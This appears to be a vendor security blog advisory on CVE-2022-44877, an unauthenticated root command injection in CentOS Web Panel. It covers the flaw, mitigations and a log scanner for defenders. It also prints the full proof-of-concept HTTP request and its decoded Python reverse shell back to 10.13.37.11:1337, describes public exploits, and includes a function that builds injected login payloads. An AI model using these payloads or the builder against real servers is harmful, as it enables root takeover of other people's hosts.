On November 7, 2022, a record was created in MITRE's CVE database describing a critical (CVSS 9.8) vulnerability in CWP7 (Control Web Panel, also known as CentOS Web Panel) for CentOS. Due to improper neutralization of special elements used in an OS command (CWE-78), it allows an unauthenticated attacker to execute arbitrary commands on the system as root by sending a specially crafted HTTP request to login/index.php, with shell metacharacters in the login parameter.
The discovery of CVE-2022-44877 is attributed to Numan Türle, who reported the issue to the Control Web Panel development team and developed a proof-of-concept exploit for it.
Proof-Of-Concept
First, Numan published this POC request on his GitHub account and on Packet Storm.
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
That is an HTTP POST request whose login query parameter carries a $( ... ) command substitution. Inside it, ${IFS} (the shell's internal field separator) stands in for every space, so the payload needs no whitespace in the URL, and the real command is Base64-encoded and piped through base64 -d | bash. The Base64 part decodes to:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.37.11",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
The purpose of this command is to establish a reverse shell from the vulnerable server to the attacker's machine at 10.13.37.11 on port 1337, with a pty attached so the shell is interactive.
The Exploits
One of the publicly available later-developed exploits targeting CVE-2022-44877 is a Metasploit module developed by Spencer McIntyre and Numan Türle, based on the original POC. This module automates the process of exploiting the vulnerability, making it easier for attackers to execute arbitrary commands on vulnerable Control Web Panel installations.
The exploit module utilizes an unauthenticated OS command injection technique. By sending a specially crafted HTTP request to the vulnerable server, an attacker can inject arbitrary operating system commands. The command execution occurs within the context of the root user, which further amplifies the impact of a successful exploit.
This module also supports different targets for exploiting the vulnerability, depending on the platform and architecture of the affected system. It includes a check function to verify if the target is vulnerable and an exploit function to execute the payload.
Another exploit targeting CVE-2022-44877 is a standalone Go script developed by Mayank Deshmukh. This script leverages the vulnerability to perform remote code execution.
The script uses a cURL command inside the payload to execute arbitrary commands on the target system. By injecting the payload into the login parameter of login/index.php, the attacker triggers execution of the injected command. The script also lets the attacker specify a listener IP and port for out-of-band callback communication. Both exploits mentioned above give attackers a way to take advantage of this vulnerability and gain unauthorized root-level access to the CWP host.
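As an added example that is not part of the original write-up or of either exploit, the following Python script does two things with the request shape shown above: it rebuilds a login= parameter the way the PoC does (Base64 stager, ${IFS} in place of spaces, wrapped in $(...)), and, on the defensive side, it scans access-log lines for /login/index.php requests whose login parameter carries shell metacharacters, decoding the stager when it finds one. It also catches the plainer metacharacter payloads the later exploits use (anything with $(, backticks, ;, | or ${IFS}). The log lines are constructed for the example; the Base64 blob is the one from the PoC request on this page.

```python
import base64
import re
from urllib.parse import unquote

# Shell metacharacters that never belong in a login name. ${IFS} is the shell's
# internal field separator; the PoC uses it in place of spaces so the payload
# needs no whitespace inside the URL.
SUSPICIOUS = re.compile(r"\$\(|\$\{IFS\}|`|;|\||&")

# Shape of the PoC stager: $(echo${IFS}<base64>${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)
B64_STAGER = re.compile(r"\$\(echo(?:\$\{IFS\}|\s)+([A-Za-z0-9+/=]+)(?:\$\{IFS\}|\s)+\|")

# Request line as it appears in a combined-format access log.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Base64 blob copied from the PoC request on the page, and the login= value it sat in.
POC_B64 = (
    "cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7"
    "cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7"
    "cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtv"
    "cy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtv"
    "cy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg"
)
POC_LOGIN_PARAM = "$(echo${IFS}" + POC_B64 + "${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)"

# Constructed access-log lines (not real traffic): a normal failed login, a PoC-shaped
# injection, a percent-encoded $(id), and an injection attempt against a different path.
SAMPLE_LOG = [
    '10.13.37.11 - - [05/Jan/2023:10:00:01 +0000] "POST /login/index.php?login=failed HTTP/1.1" 200 1234',
    '10.13.37.11 - - [05/Jan/2023:10:00:02 +0000] "POST /login/index.php?login=$(echo${IFS}aWQ=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1" 200 1234',
    '10.13.37.12 - - [05/Jan/2023:10:00:03 +0000] "GET /login/index.php?login=%24%28id%29 HTTP/1.1" 200 1234',
    '10.13.37.13 - - [05/Jan/2023:10:00:04 +0000] "GET /index.php?login=$(id) HTTP/1.1" 404 0',
]


def build_poc_login_param(command: str) -> str:
    """Rebuild a login= value the way the PoC does (lab use: reproduces the request shape)."""
    b64 = base64.b64encode(command.encode()).decode()
    stager = "echo " + b64 + " | base64 -d | bash"
    # The parameter ends up on a root shell's command line, so $(...) runs the stager.
    return "$(" + stager.replace(" ", "${IFS}") + ")"


def extract_injected_command(login_value: str):
    """Return the decoded command hidden in a PoC-shaped login= value, or None."""
    m = B64_STAGER.search(login_value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace").strip()
    except ValueError:
        return None


def scan_access_log(lines):
    """Flag requests to /login/index.php whose login parameter carries shell metacharacters."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not path.endswith("/login/index.php"):
            continue
        # Split the query by hand: parse_qs would turn a raw '+' in the base64 into a space.
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            if key != "login":
                continue
            value = unquote(raw)  # unquote, not unquote_plus, for the same reason
            if SUSPICIOUS.search(value):
                findings.append({
                    "line": n,
                    "client": line.split(" ", 1)[0],
                    "login": value,
                    "command": extract_injected_command(value),
                })
    return findings


if __name__ == "__main__":
    print("PoC payload decodes to:", extract_injected_command(POC_LOGIN_PARAM))
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Run against a real log, the scanner is only a first pass: a login value with no metacharacters at all (the "failed" redirect, or an ordinary username) is ignored, anything with $(, backticks, ;, | or ${IFS} is reported with the client address, and the decoded command is filled in only when the value matches the echo | base64 -d | bash stager shape; other payloads still get reported, just without a decoded command.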
Affected Versions and Mitigation
Control Web Panel versions prior to 0.9.8.1147 are affected by CVE-2022-44877. If you are running an earlier version, upgrade to the latest version immediately: versions 0.9.8.1147 and later include the security patch that addresses the vulnerability.
Additionally, restrict access to the Control Web Panel: limit it to trusted IP addresses or expose it only through a secure virtual private network (VPN) to minimize the exposure to potential
Finally, Some Good News
You can rely on us to stay informed about the most recent security practices, standards, and significant news in the field of cybersecurity, since we are constantly scanning the web for systems affected by some of the vulnerabilities most widely exploited in the wild.
If you have missed several security audits or lack confidence in your IT infrastructure's security, we invite you to register for our feed. That way you can determine whether you run the risk of falling prey to these vulnerabilities.
Subscribe to be updated on the new content!